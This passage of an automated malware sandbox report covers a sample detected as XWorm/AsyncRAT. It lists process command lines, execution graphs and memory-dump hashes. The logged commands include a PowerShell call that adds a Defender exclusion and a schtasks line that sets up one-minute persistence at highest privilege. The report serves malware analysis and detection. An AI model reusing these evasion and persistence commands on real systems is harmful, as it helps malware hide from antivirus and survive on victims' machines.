                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:11
                                                                Start time:12:54:33
                                                                Start date:14/12/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SYSTEM'
                                                                Imagebase:0x7ff788560000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:12
                                                                Start time:12:54:33
                                                                Start date:14/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:13
                                                                Start time:12:54:54
                                                                Start date:14/12/2024
                                                                Path:C:\Windows\System32\schtasks.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SYSTEM" /tr "C:\Users\user\AppData\Roaming\SYSTEM"
                                                                Imagebase:0x7ff76f990000
                                                                File size:235'008 bytes
                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:14
                                                                Start time:12:54:54
                                                                Start date:14/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:15
                                                                Start time:12:54:55
                                                                Start date:14/12/2024
                                                                Path:C:\Users\user\AppData\Roaming\SYSTEM
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Users\user\AppData\Roaming\SYSTEM
                                                                Imagebase:0xf10000
                                                                File size:72'704 bytes
                                                                MD5 hash:0860112F7BD00567371FAFFE18061CAB
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\SYSTEM, Author: Joe Security
                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\SYSTEM, Author: ditekSHen
                                                                Antivirus matches:
                                                                • Detection: 100%, Avira
                                                                • Detection: 100%, Joe Sandbox ML
                                                                • Detection: 76%, ReversingLabs
                                                                Has exited:true

                                                                Target ID:16
                                                                Start time:12:55:01
                                                                Start date:14/12/2024
                                                                Path:C:\Users\user\AppData\Roaming\SYSTEM
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Users\user\AppData\Roaming\SYSTEM
                                                                Imagebase:0xe40000
                                                                File size:72'704 bytes
                                                                MD5 hash:0860112F7BD00567371FAFFE18061CAB
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:18
                                                                Start time:12:56:00
                                                                Start date:14/12/2024
                                                                Path:C:\Users\user\AppData\Roaming\SYSTEM
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Users\user\AppData\Roaming\SYSTEM
                                                                Imagebase:0x6c0000
                                                                File size:72'704 bytes
                                                                MD5 hash:0860112F7BD00567371FAFFE18061CAB
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false


                                                                  Execution Graph

                                                                  Execution Coverage:21.3%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:6
                                                                  Total number of Limit Nodes:0
                                                                  execution_graph 4355 7ffd9b7f2dd8 4357 7ffd9b7f2de1 SetWindowsHookExW 4355->4357 4358 7ffd9b7f2eb1 4357->4358 4351 7ffd9b7f2aad 4352 7ffd9b7f2b10 RtlSetProcessIsCritical 4351->4352 4354 7ffd9b7f2b92 4352->4354

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2992089184.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_72OWK7wBVH.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: CAM_^
                                                                  • API String ID: 0-3136481660
                                                                  • Opcode ID: 52544dc973b5bed0655b88cc6033bcdba5b6f70407fc7dd065483b350c52395e
                                                                  • Instruction ID: 5793db62723e7aafc3f45c0f96655d3de9888952e009027bc746442c2684ad15
                                                                  • Opcode Fuzzy Hash: 52544dc973b5bed0655b88cc6033bcdba5b6f70407fc7dd065483b350c52395e
                                                                  • Instruction Fuzzy Hash: A432FA61B19A4D4FE798EB7C8479ABD7BD1FF98300F450579E04DC32E6DE28A8018781

                                                                  Control-flow Graph

                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2992089184.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_72OWK7wBVH.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 978c2c73cfc4b56bf2d85197d3a3923e4df93b17830738d21e18faa04918f0d1
                                                                  • Instruction ID: 041ce2248000267a300077145cbf642dc0708e3c6b4a9f65c3b088f873af555f
                                                                  • Opcode Fuzzy Hash: 978c2c73cfc4b56bf2d85197d3a3923e4df93b17830738d21e18faa04918f0d1
                                                                  • Instruction Fuzzy Hash: 26F1A530A09A4D8FEBA8DF28C855BE97BD1FF54310F04436EE85DC72A5DB34A9458B81

                                                                  Control-flow Graph

                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2992089184.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_72OWK7wBVH.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 43e40c9cb0c23e6a7cafba672ef1fc13679230824db1b78522632d83f94e2387
                                                                  • Instruction ID: 3240d89282d807ae0bd6fccd5c257086830e03df019dba8bad1d0c37c2b76bdf
                                                                  • Opcode Fuzzy Hash: 43e40c9cb0c23e6a7cafba672ef1fc13679230824db1b78522632d83f94e2387
                                                                  • Instruction Fuzzy Hash: 15E19330A09A4E8FEBA8DF28C855BF97BD1EF54310F14426ED84DC72A5CE7899458B81

                                                                  Control-flow Graph

                                                                  control_flow_graph 172 7ffd9b7f2aad-7ffd9b7f2b90 RtlSetProcessIsCritical 175 7ffd9b7f2b98-7ffd9b7f2bcd 172->175 176 7ffd9b7f2b92 172->176 176->175
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2992089184.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_72OWK7wBVH.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalProcess
                                                                  • String ID:
                                                                  • API String ID: 2695349919-0
                                                                  • Opcode ID: 2161b781865d1a5811173491abfb5a5893ddb89b0779bbb3b93394475b6a6fe5
                                                                  • Instruction ID: 95528d4913bbc1a4567858cbb91c2a7169a97c3b131319e4cc3374c93db4e440
                                                                  • Opcode Fuzzy Hash: 2161b781865d1a5811173491abfb5a5893ddb89b0779bbb3b93394475b6a6fe5
                                                                  • Instruction Fuzzy Hash: 0241253190C6588FCB19DF98C845BE9BBF0FF96311F04416EE08AC3592CB786846CB91

                                                                  Control-flow Graph (basic blocks and edges recovered from the rendered graph; the executed/not-executed colouring is not recoverable from the text)
                                                                  control_flow_graph 178 7ffd9b7f2dd8-7ffd9b7f2ddf 179 7ffd9b7f2dea-7ffd9b7f2e5d 178->179 180 7ffd9b7f2de1-7ffd9b7f2de9 178->180 183 7ffd9b7f2ee9-7ffd9b7f2eed 179->183 184 7ffd9b7f2e63-7ffd9b7f2e70 179->184 180->179 185 7ffd9b7f2e72-7ffd9b7f2eaf SetWindowsHookExW 183->185 184->185 187 7ffd9b7f2eb7-7ffd9b7f2ee8 185->187 188 7ffd9b7f2eb1 185->188 188->187
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2992089184.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_72OWK7wBVH.jbxd
                                                                  Similarity
                                                                  • API ID: HookWindows
                                                                  • String ID:
                                                                  • API String ID: 2559412058-0
                                                                  • Opcode ID: 5293510ea037ecd997c46ece42c359c6442112a729fadc7566a179cd2cd78e5f
                                                                  • Instruction ID: 70ddc6b8d4ea73807dbbe53272dd26b889e3dd64d1f22e59eadb5d6dc4aa3040
                                                                  • Opcode Fuzzy Hash: 5293510ea037ecd997c46ece42c359c6442112a729fadc7566a179cd2cd78e5f
                                                                  • Instruction Fuzzy Hash: EB31D630A1CA5D4FDB18EF98D85A6F97BE1EB59321F10427EE05DD3292CA74A81287C1
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1782895233.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b8c0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1003449acfa712a28e83f355b18e99ae182658f3450a6e12ffe35b9790530abe
                                                                  • Instruction ID: 95124ff619291c62c04ce1f78527a8f332325665c1bdf49851f7590b78589590
                                                                  • Opcode Fuzzy Hash: 1003449acfa712a28e83f355b18e99ae182658f3450a6e12ffe35b9790530abe
                                                                  • Instruction Fuzzy Hash: D4D135F2A0FA8E4FEB65ABA848745B57BA1EF6A310B1901FFD45CC70E3D914A905C341
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1782298881.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b4ebc7d601e407085011b80287cb7f9df06ede78e104abb799fdaf7160c34273
                                                                  • Instruction ID: 3306c71a1c6a70b9687a7afdd40c5ce493567087ea1361533da3b711e1bde97c
                                                                  • Opcode Fuzzy Hash: b4ebc7d601e407085011b80287cb7f9df06ede78e104abb799fdaf7160c34273
                                                                  • Instruction Fuzzy Hash: EB310931A1DB4C4FDB5C9F5C984A6B97BE1FB98311F04422FE44983262DA31A955CBC2
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1781613807.00007FFD9B6DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6DD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b6dd000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f3801be1b9efe1047ef0ab232ca9782540012faa9fce6606a8fcb942b1c71bb1
                                                                  • Instruction ID: 5627c3a1804162db188233f1bbd4bb5932807f818163f2ae995b9b51c051405f
                                                                  • Opcode Fuzzy Hash: f3801be1b9efe1047ef0ab232ca9782540012faa9fce6606a8fcb942b1c71bb1
                                                                  • Instruction Fuzzy Hash: 1F41037150EBC84FEB668B299C519623FB0EF52314B1702EFD0C8CB1A3D625B846C792
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1782298881.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8f2021cc844fc2993037091b89c88f3fe0e22e194867b7e4484fb351e55d6ceb
                                                                  • Instruction ID: c077424e5749412f714837d4fdc14325fd05b79ed989fa7b68469eb975acce0b
                                                                  • Opcode Fuzzy Hash: 8f2021cc844fc2993037091b89c88f3fe0e22e194867b7e4484fb351e55d6ceb
                                                                  • Instruction Fuzzy Hash: CA210C3190C74C4FDB59DF9C984A7E97FF0EB96321F04426BD449C3162DA74641ACB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1782298881.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                  • Instruction ID: f015c6d8f1291ae9f9a84129c24d6f916cfece872e45c549876b83854877da12
                                                                  • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                  • Instruction Fuzzy Hash: D001A73020CB0C4FD748EF0CE051AA5B7E0FF85360F10056DE58AC36A1DA32E882CB45
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1782895233.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b8c0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f69708b3e679aa14e79a9f3830c39709c1e2b18625d2d8513c0fae1ab36bb8f3
                                                                  • Instruction ID: 7a7df74ff58b9a50a537767b160d3269233454dd4fd6b5d2948254ce2cf2c742
                                                                  • Opcode Fuzzy Hash: f69708b3e679aa14e79a9f3830c39709c1e2b18625d2d8513c0fae1ab36bb8f3
                                                                  • Instruction Fuzzy Hash: 4CF09A32B0E5098FD768EB5CE4518A873E0EF5932071600BBE0ADC75B3CA25EC808780
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1782895233.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b8c0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1ba78c1ac94e44744a7c1fb43680fb0051af5e734e40b9758d2c8b0680dd4976
                                                                  • Instruction ID: e4fbf44bb38b53c8b25aa3f64a42391c1ad9612c598efa424671fe116f23c72b
                                                                  • Opcode Fuzzy Hash: 1ba78c1ac94e44744a7c1fb43680fb0051af5e734e40b9758d2c8b0680dd4976
                                                                  • Instruction Fuzzy Hash: 4AF05E72A0E5498FDB64EB5CE4618A877E0FF4932475600BBE15DCB4A3DA25FC84C790
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1782895233.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b8c0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                  • Instruction ID: 19611bf992d818319ffca05ef679498bf87821be3afbc0c8495d4bacff4bf068
                                                                  • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                  • Instruction Fuzzy Hash: DCE0E531B0C8088FDA78EB4CE0519A973E1EB9832171611ABD18EC7562CA22ED918B80
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1782298881.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ef5532bab3d669a1860dd96f8ffa3cff6c22b2e4e400784fcfe1ded3ad5d5237
                                                                  • Instruction ID: 8b2a7061d6a2575d52b679a8906af76b5a6c9153205c3cd09c37b59f9194fe07
                                                                  • Opcode Fuzzy Hash: ef5532bab3d669a1860dd96f8ffa3cff6c22b2e4e400784fcfe1ded3ad5d5237
                                                                  • Instruction Fuzzy Hash: 47E04631910A0C8F8B44EF18D8498EA7BA0FB28305B0002ABE80DC7120DB30AA58CBC2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1782298881.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: L_^4$L_^7$L_^F$L_^J
                                                                  • API String ID: 0-3225005683
                                                                  • Opcode ID: 094baacac4173d964dd07137b5425fa9e43bff048cc2dba61da4707fa992f5a4
                                                                  • Instruction ID: 04a69f08816bc91c8d325c6fadc50cdf1a4162b35631b59aac8caa5ed48679d6
                                                                  • Opcode Fuzzy Hash: 094baacac4173d964dd07137b5425fa9e43bff048cc2dba61da4707fa992f5a4
                                                                  • Instruction Fuzzy Hash: 022126BBB081654ED305BBBDB8199ED3750CFD423935692F2D2A98B093EE147086CAD0
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1879332891.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffd9b7d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e45a36716b894b56d55fe6a2c2f9ae97737f8b3263fe10915ec345b9143c6ddf
                                                                  • Instruction ID: b56b85e0e50233f3145f057cc430edb20f24522280d66343d16059d64333cb7c
                                                                  • Opcode Fuzzy Hash: e45a36716b894b56d55fe6a2c2f9ae97737f8b3263fe10915ec345b9143c6ddf
                                                                  • Instruction Fuzzy Hash: 32D19030A08A4D8FDF94DF58C465AE9BBE1FFA8340F15426AD44DD72A5CB34E885CB81
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1883231389.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f7c49275749966728c0905b17ab0c5f6c76f92d8f7842e6ca1f73b31f44a535e
                                                                  • Instruction ID: 374c5a3f4b82e7524e2320812124ef3ecf496fae04f4abfcad97add5c88446f8
                                                                  • Opcode Fuzzy Hash: f7c49275749966728c0905b17ab0c5f6c76f92d8f7842e6ca1f73b31f44a535e
                                                                  • Instruction Fuzzy Hash: 2BD158B2B0FA8E4FEBA5ABA848655B5BBD0EF59314B0901FED44DC70E7D918AC01C351
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1879332891.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffd9b7d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8233fca323a215e6ea3bdf319c7784236a292cb1a20f8c09cb7c671ded1b0ed4
                                                                  • Instruction ID: eccf6f7dcae749933bb1c8fa95d8316ab0841f91faacf7c4586de3023ff14d06
                                                                  • Opcode Fuzzy Hash: 8233fca323a215e6ea3bdf319c7784236a292cb1a20f8c09cb7c671ded1b0ed4
                                                                  • Instruction Fuzzy Hash: B8814D31A0DB8C4FDB59DB6C98456E97FE0FB96321F04436FD049C32A2DA74A84AC791
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1879332891.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffd9b7d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a7904da2e3b87de4e55d7e5d216bf343aaa2d447f2554200854bad612e25c778
                                                                  • Instruction ID: 70c4a0d8952e8b92f954f9826df6e117e3247c640949f81eb0ec7b47b21abf4c
                                                                  • Opcode Fuzzy Hash: a7904da2e3b87de4e55d7e5d216bf343aaa2d447f2554200854bad612e25c778
                                                                  • Instruction Fuzzy Hash: AD412C7190DB884FD759DF5C9C1A6A9BFE0FB99310F04426FD089D3292C664B905C7C2
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1878450868.00007FFD9B6BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6BD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffd9b6bd000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9807c477412866fbae5d8da3ca55ee15cb6fde10e58f33bb893552a048ceb66e
                                                                  • Instruction ID: b224b4bcf5f900d73d277bf9483c37b39deb5cb0f09d8d859f078eb3e898a058
                                                                  • Opcode Fuzzy Hash: 9807c477412866fbae5d8da3ca55ee15cb6fde10e58f33bb893552a048ceb66e
                                                                  • Instruction Fuzzy Hash: 1B31487140DBC44FE7969B3998559523FF0EF56320B1A06DFD0C8CB1A3D625E84AC7A2
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1879332891.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffd9b7d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 672cddce3b61fd07d14acf0d5ff0c6c5c9905a2842d53f114a6d1ab46604d338
                                                                  • Instruction ID: 7d18de3127f3f1dd01fd625624dbb9d3bcbd9e505403495affb5961ee0d50b6a
                                                                  • Opcode Fuzzy Hash: 672cddce3b61fd07d14acf0d5ff0c6c5c9905a2842d53f114a6d1ab46604d338
                                                                  • Instruction Fuzzy Hash: 4D01A73020CB0C4FD748EF0CE051AA5B3E0FB85360F10066DE58AC36A1DA32E882CB41
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1883231389.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c3ba9c76b812426ca825957747f32be5abd44d94721cefb41bf3632dbc65b8c2
                                                                  • Instruction ID: 179bfb2d77a83c18c9bab8e290d68a1b9e04c089ba0591afc1fc6895ca5f49b4
                                                                  • Opcode Fuzzy Hash: c3ba9c76b812426ca825957747f32be5abd44d94721cefb41bf3632dbc65b8c2
                                                                  • Instruction Fuzzy Hash: F1F09A32B0E5098FDB68EB5CE4518A877E0EF5932071600BAE06DC71B3CA25EC408790
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1883231389.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 734352866a7486e52b30f3784d5e5ed2d6df21b7946a5c0d5923a187f31a029c
                                                                  • Instruction ID: 3938f795043345527b0229bb82ca38e788a8fd97b0fe3a83b23454260c144206
                                                                  • Opcode Fuzzy Hash: 734352866a7486e52b30f3784d5e5ed2d6df21b7946a5c0d5923a187f31a029c
                                                                  • Instruction Fuzzy Hash: 7BF05E32A0F5498FDB64EB5CE4618A877E0FF4932475600BAE15DCB4A3DA29BC44C790
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1883231389.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                  • Instruction ID: 09323d83657ad24737761ed45f903d87c673e9f131c1b1bb4a609df375895b1c
                                                                  • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                  • Instruction Fuzzy Hash: D7E01A31B0C8088FDA78DB4CE0519A977E1EBA832171601BBD14EC7571CA22ED518B90
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1879332891.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffd9b7d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: N_^8$N_^<$N_^?$N_^J$N_^K$N_^N$N_^Q$N_^Y
                                                                  • API String ID: 0-2388461625
                                                                  • Opcode ID: bcc06938ea63191cee45e705da55fa88be9bb517e08e1f42c75fe065d1d827ea
                                                                  • Instruction ID: 79cce54cdb1bb4ab17fa38f3220a3fc588b67c58b22875dadc209c7226430fe4
                                                                  • Opcode Fuzzy Hash: bcc06938ea63191cee45e705da55fa88be9bb517e08e1f42c75fe065d1d827ea
                                                                  • Instruction Fuzzy Hash: 29212277E085614AC30677BCBD659DC2B91DB9437935A42F3E228CF193CD24A48B8682
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2041936650.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffd9b8c0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6356f26c91934a316e6e61557ddb123cbcdb247727cf6e720b56f3d215b58630
                                                                  • Instruction ID: d943b50dfbc8afd1380bef8367fa65a0d6a605256cc739e23d6818798370c2e1
                                                                  • Opcode Fuzzy Hash: 6356f26c91934a316e6e61557ddb123cbcdb247727cf6e720b56f3d215b58630
                                                                  • Instruction Fuzzy Hash: 31D158F2B0EA8E4FEBA5BB6848645B57BA0EF69314B1901FFD44CC70E3D918A805C341
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2040995898.00007FFD9B7F5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F5000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffd9b7f5000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
